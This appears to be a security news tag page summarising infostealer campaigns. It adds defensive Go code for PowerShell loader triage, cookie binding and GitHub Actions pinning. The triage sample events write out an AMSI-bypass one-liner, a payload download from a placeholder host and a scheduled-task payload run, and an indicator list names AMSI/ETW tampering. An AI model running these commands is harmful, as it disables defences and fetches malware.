Tag

Infostealer

All articles tagged with #infostealer

Kash Patel's merch site hacked to push malware through a fake Cloudflare check
technology · 5 days ago

A Based Apparel storefront tied to Kash Patel was compromised. Visitors were shown a fake Cloudflare verification page and urged to copy a command into their terminal; running it installed a macOS infostealer that harvests credentials, browser data, crypto-wallet extension data and Keychain items, and a payment skimmer is suspected as well. The malware was delivered through a malicious WordPress plugin, but how the attackers first got into the site remains unclear. Patel has distanced himself from the store, and there is no confirmed FBI involvement at this time.

Fake OpenAI Privacy Filter Repo Delivers Windows Infostealer on Hugging Face
security · 16 days ago

A clone of OpenAI's Privacy Filter model on Hugging Face impersonated the legitimate repository to distribute a Windows infostealer. Its loader fetches Base64-encoded payloads via JSON Keeper and PowerShell, then registers a one-shot scheduled task to run the final stage, which exfiltrates screenshots, crypto-wallet and browser data to a remote domain and tries to evade detection by disabling AMSI and ETW. The repository reached #1 with about 244,000 downloads before it was disabled; researchers link it to similar loaders and to ValleyRAT-related campaigns targeting open-source ecosystems.
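The PowerShell stage is the natural place to hunt for this loader. The Go program below is an added example, not code from the researchers or from the campaign: it decodes `-EncodedCommand` blobs from process-creation command lines (an assumption, since the summary only says Base64 and PowerShell were used) and flags substrings that the usual AMSI/ETW-tampering one-liners and one-shot task registration leave behind. The three sample command lines and the indicator list are constructed for the example and should be tuned to your environment.

```go
package main

import (
	"encoding/base64"
	"encoding/binary"
	"errors"
	"fmt"
	"regexp"
	"sort"
	"strings"
	"unicode/utf16"
)

// EncodeCommand builds what PowerShell accepts after -EncodedCommand: the
// script as UTF-16LE, then Base64. It exists here only to construct the
// sample events below without hand-typing a blob.
func EncodeCommand(script string) string {
	u := utf16.Encode([]rune(script))
	raw := make([]byte, 2*len(u))
	for i, c := range u {
		binary.LittleEndian.PutUint16(raw[2*i:], c)
	}
	return base64.StdEncoding.EncodeToString(raw)
}

// DecodeCommand reverses it so indicators are matched on the real script.
func DecodeCommand(b64 string) (string, error) {
	raw, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return "", err
	}
	if len(raw)%2 != 0 {
		return "", errors.New("odd-length blob is not UTF-16LE")
	}
	u := make([]uint16, len(raw)/2)
	for i := range u {
		u[i] = binary.LittleEndian.Uint16(raw[2*i:])
	}
	return string(utf16.Decode(u)), nil
}

// PowerShell accepts several abbreviations of -EncodedCommand; these are the
// spellings seen most often on command lines.
var encRe = regexp.MustCompile(`(?i)\s(?:-e|-ec|-enc|-encodedcommand)\s+([A-Za-z0-9+/=]+)`)

// indicators map a lower-cased substring to the behaviour it suggests. The
// AMSI/ETW entries are the names the common tampering one-liners reference;
// the list is an assumption of this example, not a vetted rule set.
var indicators = map[string]string{
	"amsiutils":        "AMSI tamper (AmsiUtils reflection)",
	"amsiinitfailed":   "AMSI tamper (amsiInitFailed)",
	"amsiscanbuffer":   "AMSI tamper (AmsiScanBuffer patch)",
	"etweventwrite":    "ETW tamper (EtwEventWrite patch)",
	"schtasks":         "scheduled task registered from the command line",
	"frombase64string": "inline Base64 payload decode",
}

// Triage inspects one process command line, decodes an encoded PowerShell
// blob if present, and returns the matching indicator descriptions, sorted.
func Triage(cmdline string) []string {
	text := cmdline
	if m := encRe.FindStringSubmatch(cmdline); m != nil {
		if dec, err := DecodeCommand(m[1]); err == nil {
			text += " " + dec
		}
	}
	lower := strings.ToLower(text)
	var hits []string
	for needle, desc := range indicators {
		if strings.Contains(lower, needle) {
			hits = append(hits, desc)
		}
	}
	sort.Strings(hits)
	return hits
}

// SampleEvents are constructed process-creation command lines, not captures
// from the campaign described above.
var SampleEvents = []string{
	// loader stage: AMSI disabled via reflection, next stage fetched
	"powershell.exe -nop -w hidden -enc " + EncodeCommand(
		`[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true); Invoke-WebRequest http://example.invalid/p -OutFile $env:TEMP\p.exe`),
	// one-shot task that runs the final payload a single time
	`schtasks.exe /create /tn Updater /sc once /st 12:00 /tr C:\Users\Public\p.exe`,
	// benign administration, should produce no hits
	`powershell.exe -Command Get-Service -Name Spooler`,
}

func main() {
	for i, ev := range SampleEvents {
		fmt.Printf("event %d: %v\n", i, Triage(ev))
	}
}
```

Decoding before matching is the part that matters: the Base64 form of the script contains none of the indicator strings, so a rule that only looks at the raw command line misses exactly the stage this loader relies on.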

Mac malware slips into Claude chats via Google ads
technology · 17 days ago

Researchers uncovered a malvertising campaign that abuses Google Ads and shared Claude.ai chats to deliver macOS malware. Sponsored results send users to a genuine claude.ai shared chat that instructs them to paste a command into the terminal; the command downloads a polymorphic loader and a second-stage payload that is executed via osascript, giving the operators remote code execution, and some variants also exfiltrate browser data and Keychain contents. The operation runs on two separate infrastructures and performs locale checks to skip certain targets. Download Claude apps only from claude.ai, and do not run a terminal command because a chat or an ad told you to.

Chrome secures sessions by binding cookies to hardware, thwarting infostealer theft
technology · 1 month ago

Google Chrome 146 on Windows adds Device Bound Session Credentials (DBSC), which cryptographically bind a session to a key held in the device's hardware (the TPM on Windows; the Secure Enclave on macOS once support ships in a future Chrome release). The session cookie itself becomes short-lived, and extending it requires proving possession of the hardware-bound private key, so a cookie copied by an infostealer stops working when it expires and cannot be renewed on the attacker's machine. The DBSC protocol, developed with Microsoft and tested with partners such as Okta, aims to cut cookie theft while preserving privacy; implementation guidance and W3C specifications are available for developers.
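The refresh step is where the hardware binding bites. The Go program below is an added example, not Chrome's or Google's DBSC code: it models the flow with a P-256 key standing in for the TPM/Secure Enclave key and a simple challenge/response refresh, both assumptions of this example rather than the real protocol's message formats. The scenario copies the cookie the way an infostealer would and shows what the thief can and cannot do with it.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
	"time"
)

// DeviceKey stands in for a TPM / Secure Enclave key (assumption): generated
// inside, never exported, only Sign is exposed.
type DeviceKey struct{ priv *ecdsa.PrivateKey }

func NewDeviceKey() *DeviceKey {
	priv, _ := ecdsa.GenerateKey(elliptic.P256(), rand.Reader) // fails only if crypto/rand does
	return &DeviceKey{priv: priv}
}

func (d *DeviceKey) Public() *ecdsa.PublicKey { return &d.priv.PublicKey }

func (d *DeviceKey) Sign(nonce []byte) []byte {
	h := sha256.Sum256(nonce)
	sig, _ := ecdsa.SignASN1(rand.Reader, d.priv, h[:]) // likewise
	return sig
}

type session struct {
	pub       *ecdsa.PublicKey
	cookie    string
	expiresAt time.Time
	nonce     []byte // outstanding single-use refresh challenge, nil if none
}

// Server keeps each session bound to a public key and only issues short-lived
// cookies; extending a session has to go through Challenge and Refresh.
type Server struct {
	ttl      time.Duration
	sessions map[string]*session
}

func randomHex(n int) string {
	b := make([]byte, n)
	rand.Read(b) // crypto/rand is documented never to fail on supported platforms
	return hex.EncodeToString(b)
}

// Register binds a session to the device public key at login.
func (s *Server) Register(pub *ecdsa.PublicKey, now time.Time) (sid, cookie string) {
	sid, cookie = randomHex(8), randomHex(16)
	s.sessions[sid] = &session{pub: pub, cookie: cookie, expiresAt: now.Add(s.ttl)}
	return sid, cookie
}

// Authorize is the ordinary request path. It never touches the key, which is
// exactly why a freshly stolen cookie still works until it expires.
func (s *Server) Authorize(sid, cookie string, now time.Time) bool {
	sess, ok := s.sessions[sid]
	return ok && sess.cookie == cookie && now.Before(sess.expiresAt)
}

// Challenge hands out a fresh nonce to start a refresh.
func (s *Server) Challenge(sid string) []byte {
	s.sessions[sid].nonce = []byte(randomHex(16))
	return s.sessions[sid].nonce
}

// Refresh issues a new cookie only for a valid signature over the outstanding
// nonce; the nonce is consumed either way, so a captured signature cannot be replayed.
func (s *Server) Refresh(sid string, sig []byte, now time.Time) (string, error) {
	sess := s.sessions[sid]
	if sess.nonce == nil {
		return "", errors.New("no outstanding challenge")
	}
	h := sha256.Sum256(sess.nonce)
	sess.nonce = nil
	if !ecdsa.VerifyASN1(sess.pub, h[:], sig) {
		return "", errors.New("proof of possession failed")
	}
	sess.cookie, sess.expiresAt = randomHex(16), now.Add(s.ttl)
	return sess.cookie, nil
}

// Scenario plays out a theft and reports: the stolen cookie works before
// expiry, fails after expiry, the thief cannot refresh it, the real browser can.
func Scenario() (before, after, thiefRefreshed, legitRefreshed bool) {
	dev := NewDeviceKey()
	srv := &Server{ttl: 10 * time.Minute, sessions: map[string]*session{}}
	t0 := time.Date(2025, 1, 1, 0, 0, 0, 0, time.UTC)
	sid, stolen := srv.Register(dev.Public(), t0) // the infostealer copies this value
	before = srv.Authorize(sid, stolen, t0.Add(time.Minute))
	later := t0.Add(11 * time.Minute)
	after = srv.Authorize(sid, stolen, later)
	srv.Challenge(sid) // the thief can obtain a nonce but has nothing to sign it with
	_, err := srv.Refresh(sid, []byte("forged"), later)
	thiefRefreshed = err == nil
	fresh, err := srv.Refresh(sid, dev.Sign(srv.Challenge(sid)), later)
	legitRefreshed = err == nil && srv.Authorize(sid, fresh, later)
	return
}

func main() { fmt.Println(Scenario()) } // true false false true
```

The point to keep in mind when reading the headline: a cookie lifted from disk still authorizes requests until it expires. DBSC shrinks that window to the cookie lifetime and stops the attacker from extending it; it does not make the theft harmless on the spot, which is why the cookie TTL is the knob that matters on the server side.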

Trivy hit by TeamPCP supply-chain attack through GitHub Actions
security · 2 months ago

The Trivy vulnerability scanner was compromised in a supply-chain attack by the threat actor TeamPCP, who backdoored Trivy's GitHub build process and trojanized releases and the related GitHub Actions (notably v0.69.4). The implant is an infostealer that harvests credentials and other secrets from GitHub Actions runners, CI configuration, and local developer environments, exfiltrating them to a typosquatted C2 server or via a public repository. With write access, the attackers published malicious releases and force-pushed most tags, so workflows that referenced the actions by tag pulled the trojanized code without any visible change on their side, which made detection difficult; Aqua Security traced the breach to an earlier credential exfiltration and noted that token rotation was not atomic. The incident is linked to a follow-up CanisterWorm npm campaign by the same actor. Remediation: rotate all secrets, audit for compromise, and check for persistence across every environment that ran the affected versions.
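Force-pushed tags are only a problem for workflows that reference actions by tag or branch. The checker below is an added example, not Aqua Security's or GitHub's tooling: it scans workflow YAML for `uses:` references that are not pinned to a full commit SHA. The sample workflow and the SHA in it are constructed for the example and are not taken from any real project.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Finding is one `uses:` reference that is not pinned to a full commit SHA.
type Finding struct {
	Line   int
	Action string
	Ref    string // tag or branch, or "" when no @ref was given at all
}

var (
	// Matches `uses: owner/repo@ref`, with or without a leading "- " or quotes.
	usesRe = regexp.MustCompile(`^\s*-?\s*uses:\s*["']?([^\s"'#]+)`)
	shaRe  = regexp.MustCompile(`^[0-9a-f]{40}$`)
)

// FindUnpinned scans workflow YAML line by line and reports every action
// reference that a force-pushed tag or branch could silently redirect.
// Local actions (./path) are part of the repository itself and docker://
// images need an image-digest check instead, so both are skipped.
func FindUnpinned(workflow string) []Finding {
	var out []Finding
	for i, line := range strings.Split(workflow, "\n") {
		m := usesRe.FindStringSubmatch(line)
		if m == nil {
			continue
		}
		spec := m[1]
		if strings.HasPrefix(spec, "./") || strings.HasPrefix(spec, "docker://") {
			continue
		}
		action, ref, _ := strings.Cut(spec, "@")
		if !shaRe.MatchString(ref) {
			out = append(out, Finding{Line: i + 1, Action: action, Ref: ref})
		}
	}
	return out
}

// SampleWorkflow is constructed for this example; the SHA is a placeholder,
// not a real commit of any project.
const SampleWorkflow = `name: scan
on: [push]
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: "aquasecurity/trivy-action@master"
      - uses: actions/setup-go@0123456789abcdef0123456789abcdef01234567 # v5
      - uses: ./.github/actions/local-helper
      - name: Run scanner
        run: ./scan.sh
`

func main() {
	for _, f := range FindUnpinned(SampleWorkflow) {
		fmt.Printf("line %d: %s@%s is not pinned to a commit SHA\n", f.Line, f.Action, f.Ref)
	}
}
```

A SHA pin covers the action's own code only. Binaries or release archives that an action downloads at run time need their own digest or signature check, which this script does not perform, so treat a clean result as one layer of the audit, not the whole of it.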

Public Database Leak Exposes 149 Million Logins, Highlighting Infostealer Risk
cybersecurity · 4 months ago

A publicly accessible database exposed 149 million account credentials, including 48 million Gmail logins and 17 million Facebook logins, along with government, banking, and education accounts. The researcher who found it suspects infostealing malware collected the data, and the provider took the trove down after being alerted; the leak highlights how unsecured databases can become a goldmine for cybercriminals.

Hacker Injects Malware into Early Access Steam Game
technology · 10 months ago

A threat actor known as EncryptHub compromised Chemia, an early access game on Steam, by adding malicious binaries that steal user data; the game remains available on Steam and poses a risk to players. The payload includes HijackLoader and the Vidar infostealer, and the attack may have involved insider help. Steam has not issued an official statement, and users are advised not to download the game until further notice.

Minecraft Players Targeted by Malware Masquerading as Game Mods
technology · 11 months ago

A malware campaign run by the Stargazers Ghost Network targets Minecraft players with fake mods and cheats. Malicious Java and .NET payloads, distributed through GitHub repositories and Pastebin links, infect Windows machines and steal credentials, tokens and cryptocurrency wallets, with an emphasis on evading detection and exfiltrating the data to Russian-controlled servers.

PyPI Malware Threatens Windows and Linux Users with Crypto and Info Theft
cybersecurity · 2 years ago

Malicious packages on PyPI have been found to deliver the WhiteSnake Stealer on Windows while targeting Linux hosts with a Python script. The malware, uploaded by a threat actor named "WS", steals information, communicates with its C&C server over Tor, and exfiltrates sensitive data, crypto-wallet information in particular. The packages overwrite clipboard contents with attacker-owned wallet addresses and steal data from browsers, applications and crypto services. The find shows how a single malware author can seed multiple info-stealing packages into PyPI over time.

Realst Malware: Protecting Your macOS Sonoma and Cryptocurrency Wallets
cybersecurity · 2 years ago

Cybercriminals are spreading a new infostealer called Realst through fake blockchain games, targeting both Windows and macOS users; some variants already target macOS 14 Sonoma, which is due for release in the fall. Realst silently collects browser data, stored passwords included, and can empty cryptocurrency wallets. To protect against Realst and similar malware: be cautious when installing software from outside the Mac App Store, verify links before opening them, use strong passwords and two-step verification, think before granting permissions, and keep devices and applications up to date.